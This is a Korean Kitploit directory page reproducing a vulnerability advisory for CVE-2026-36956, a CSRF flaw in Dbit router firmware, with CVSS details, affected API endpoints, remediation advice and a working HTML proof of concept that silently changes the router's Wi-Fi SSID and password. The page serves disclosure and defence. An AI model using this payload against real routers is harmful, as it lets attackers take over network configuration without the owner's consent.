Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-36956 — # CVE-2026-36956 개념 증명, Dbit 라우터 펌웨어의 CSRF 취약점으로 위조된 요청을 통한 무단 구성 변경 허용 | Kitploit
도구/GitHubGitHub/kirubel-cve/cve-2026-36956
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubkirubel-cve/cve-2026-36956

CVE-2026-36956

# CVE-2026-36956 개념 증명, Dbit 라우터 펌웨어의 CSRF 취약점으로 위조된 요청을 통한 무단 구성 변경 허용

저장소 보기
24개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-36956: 웹 관리 인터페이스의 사이트 간 요청 위조(CSRF)

CVE ID: CVE-2026-36956 날짜: 2026-04-29 발견자: Kirubel Solomne 공급업체: Shenzhen Dibit Network Equipment Co., Ltd. 제품: Dbit Router 펌웨어 버전: V1.0.0 CWE: CWE-352 - 사이트 간 요청 위조(CSRF)


설명

Dbit Router 펌웨어 V1.0.0은 관리 API 엔드포인트에 대해 CSRF 방지 토큰 또는 엄격한 Origin/Referer 검증과 같은 CSRF 보호 메커니즘을 구현하지 않습니다. 공격자는 구성 엔드포인트에 위조된 HTTP 요청을 보내는 악성 웹페이지를 제작할 수 있습니다. 인증된 관리자가 해당 악성 페이지를 방문하면 라우터는 위조된 요청을 합법적인 관리 작업으로 처리합니다.


CVSS 점수

CVSS v3.1 점수: 8.8 (높음) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

지표값
공격 경로네트워크
공격 복잡성낮음
필요한 권한없음
사용자 상호작용필요
기밀성 영향높음
무결성 영향높음
가용성 영향높음

영향을 받는 엔드포인트

엔드포인트기능
/api/setWlan무선 네트워크 구성(SSID, 비밀번호)
/api/setWanWAN 구성
/api/setSystem시스템 구성

개념 증명

다음을 poc.html로 저장하고 관리자가 라우터에 로그인한 상태에서 열어보십시오:

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

예상 동작: CSRF 토큰 불일치로 인해 요청이 거부되어야 합니다. 실제 동작: 라우터가 위조된 요청을 수락하고 처리합니다.


영향

  • WiFi SSID 및 비밀번호의 무단 변경
  • WAN/DNS 구성 변경
  • 합법적인 사용자에 대한 서비스 거부
  • 라우터 구성 전체 탈취

해결 방안

  • 모든 상태 변경 엔드포인트에 CSRF 방지 토큰 구현
  • 엄격한 Origin 및 Referer 헤더 검증 적용
  • 세션 쿠키에 SameSite=Strict 쿠키 속성 사용

공개 타임라인

날짜이벤트
2026-04-29취약점 발견
2026-04-29MITRE에 보고
2026-04-29CVE-2026-36956 배정
2026-04-29공개 공개

참고 자료

  • MITRE CVE-2026-36956
  • CWE-352
  • 공급업체 웹사이트
도구 다운로드